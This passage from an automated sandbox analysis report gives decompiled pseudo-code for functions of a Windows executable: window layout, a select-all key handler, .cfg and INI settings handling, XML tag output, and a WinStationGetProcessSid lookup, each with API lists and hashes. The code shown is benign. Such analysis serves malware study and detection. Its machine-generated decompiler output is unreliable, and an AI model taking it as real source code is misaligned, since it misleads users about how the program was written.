                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                                                                                                                            • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 2498372239-3993045852
                                                                                                                                                                                                                          • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                                                                                                                          • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                                                                                                                                          0x00403a7d
                                                                                                                                                                                                                          0x00403a8c
                                                                                                                                                                                                                          0x00403a9c
                                                                                                                                                                                                                          0x00403aba
                                                                                                                                                                                                                          0x00403adf
                                                                                                                                                                                                                          0x00403ae7
                                                                                                                                                                                                                          0x00403af4
                                                                                                                                                                                                                          0x00403af4
                                                                                                                                                                                                                          0x00403ae7
                                                                                                                                                                                                                          0x00403aba
                                                                                                                                                                                                                          0x00403a9c
                                                                                                                                                                                                                          0x00403b13

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                                                                                                                            • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: State$CallMessageProcSendWindow
                                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                                          • API String ID: 3924021322-3554254475
                                                                                                                                                                                                                          • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                                                                          • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                          			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                                                                                                                                          0x004034f0
                                                                                                                                                                                                                          0x004034f8
                                                                                                                                                                                                                          0x00403506
                                                                                                                                                                                                                          0x00403516
                                                                                                                                                                                                                          0x0040351c
                                                                                                                                                                                                                          0x00403531
                                                                                                                                                                                                                          0x00403537
                                                                                                                                                                                                                          0x00403545
                                                                                                                                                                                                                          0x0040354a
                                                                                                                                                                                                                          0x00403556
                                                                                                                                                                                                                          0x00403567
                                                                                                                                                                                                                          0x00403575
                                                                                                                                                                                                                          0x00403583
                                                                                                                                                                                                                          0x00403583
                                                                                                                                                                                                                          0x00403586
                                                                                                                                                                                                                          0x00403592
                                                                                                                                                                                                                          0x00403598
                                                                                                                                                                                                                          0x004035ac

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403537
                                                                                                                                                                                                                          • _ultow.MSVCRT ref: 00403575
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$memset$_ultow
                                                                                                                                                                                                                          • String ID: cf@$q
                                                                                                                                                                                                                          • API String ID: 3448780718-2693627795
                                                                                                                                                                                                                          • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                                                                                                                          • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                          			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				return E00402FC6(_t29, _t36,  &_v532);
			}










                                                                                                                                                                                                                          0x00402f3a
                                                                                                                                                                                                                          0x00402f51
                                                                                                                                                                                                                          0x00402f60
                                                                                                                                                                                                                          0x00402f6f
                                                                                                                                                                                                                          0x00402f78
                                                                                                                                                                                                                          0x00402f7a
                                                                                                                                                                                                                          0x00402f7a
                                                                                                                                                                                                                          0x00402f8a
                                                                                                                                                                                                                          0x00402f8f
                                                                                                                                                                                                                          0x00402f94
                                                                                                                                                                                                                          0x00402f99
                                                                                                                                                                                                                          0x00402f9e
                                                                                                                                                                                                                          0x00402f9f
                                                                                                                                                                                                                          0x00402fad
                                                                                                                                                                                                                          0x00402fb2
                                                                                                                                                                                                                          0x00402fb2
                                                                                                                                                                                                                          0x00402fc5

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402F51
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00402F8A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                          • String ID: .cfg
                                                                                                                                                                                                                          • API String ID: 776488737-3410578098
                                                                                                                                                                                                                          • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                                                                                                                          • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                                                                                                                                          0x00407e2d
                                                                                                                                                                                                                          0x00407e46
                                                                                                                                                                                                                          0x00407e48
                                                                                                                                                                                                                          0x00407e4d
                                                                                                                                                                                                                          0x00407e5f
                                                                                                                                                                                                                          0x00407e6b
                                                                                                                                                                                                                          0x00407e6f
                                                                                                                                                                                                                          0x00407e75
                                                                                                                                                                                                                          0x00407e7c
                                                                                                                                                                                                                          0x00407e7d
                                                                                                                                                                                                                          0x00407e88
                                                                                                                                                                                                                          0x00407e8d
                                                                                                                                                                                                                          0x00407e8e
                                                                                                                                                                                                                          0x00407eaa

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E48
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E5F
                                                                                                                                                                                                                            • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                                                                                                                            • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                                                                          • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                                                                          • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                                          			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                                                                                                                                          0x00405e0a
                                                                                                                                                                                                                          0x00405e12
                                                                                                                                                                                                                          0x00405e18
                                                                                                                                                                                                                          0x00405e1c
                                                                                                                                                                                                                          0x00405e1e
                                                                                                                                                                                                                          0x00405e1e
                                                                                                                                                                                                                          0x00405e24
                                                                                                                                                                                                                          0x00405e2c
                                                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                                                          0x00405e44
                                                                                                                                                                                                                          0x00405e49
                                                                                                                                                                                                                          0x00405e4c
                                                                                                                                                                                                                          0x00405e4d
                                                                                                                                                                                                                          0x00405e68
                                                                                                                                                                                                                          0x00405e74
                                                                                                                                                                                                                          0x00405e74
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00405e84
                                                                                                                                                                                                                          0x00405e8c

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                          • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                                                                          • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                                                                                                                          0x00409a4a
                                                                                                                                                                                                                          0x00409a4f
                                                                                                                                                                                                                          0x00409a56
                                                                                                                                                                                                                          0x00409a5e
                                                                                                                                                                                                                          0x00409a60
                                                                                                                                                                                                                          0x00409a6e
                                                                                                                                                                                                                          0x00409a6e
                                                                                                                                                                                                                          0x00409a60
                                                                                                                                                                                                                          0x00409a71
                                                                                                                                                                                                                          0x00409a76
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409a78
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409a89

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                                                                                                                          • API String ID: 946536540-379566740
                                                                                                                                                                                                                          • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                                                                          • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                                                                                                                          0x0040588e
                                                                                                                                                                                                                          0x0040588f
                                                                                                                                                                                                                          0x0040588f
                                                                                                                                                                                                                          0x00405892
                                                                                                                                                                                                                          0x00405896
                                                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                                                          0x004058a9
                                                                                                                                                                                                                          0x004058ad
                                                                                                                                                                                                                          0x004058af
                                                                                                                                                                                                                          0x004058b5
                                                                                                                                                                                                                          0x004058b6
                                                                                                                                                                                                                          0x004058b9
                                                                                                                                                                                                                          0x004058c2
                                                                                                                                                                                                                          0x004058c3
                                                                                                                                                                                                                          0x004058c8
                                                                                                                                                                                                                          0x004058d2
                                                                                                                                                                                                                          0x004058d4
                                                                                                                                                                                                                          0x004058d9
                                                                                                                                                                                                                          0x004058e0
                                                                                                                                                                                                                          0x004058ea
                                                                                                                                                                                                                          0x004058ec
                                                                                                                                                                                                                          0x004058ed
                                                                                                                                                                                                                          0x004058f2
                                                                                                                                                                                                                          0x004058f9
                                                                                                                                                                                                                          0x00405902
                                                                                                                                                                                                                          0x00405898
                                                                                                                                                                                                                          0x00405898
                                                                                                                                                                                                                          0x0040589a
                                                                                                                                                                                                                          0x0040589c
                                                                                                                                                                                                                          0x004058a1
                                                                                                                                                                                                                          0x004058a2
                                                                                                                                                                                                                          0x004058a5
                                                                                                                                                                                                                          0x004058a7
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004058a7
                                                                                                                                                                                                                          0x00405912
                                                                                                                                                                                                                          0x00405915
                                                                                                                                                                                                                          0x0040591e
                                                                                                                                                                                                                          0x0040591e
                                                                                                                                                                                                                          0x00405907
                                                                                                                                                                                                                          0x0040590b

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                                                          • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                                                                                                                          • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                                                                                                          			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}










                                                                                                                                                                                                                          0x00409ddc
                                                                                                                                                                                                                          0x00409de4
                                                                                                                                                                                                                          0x00409df0
                                                                                                                                                                                                                          0x00409df5
                                                                                                                                                                                                                          0x00409df6
                                                                                                                                                                                                                          0x00409e03
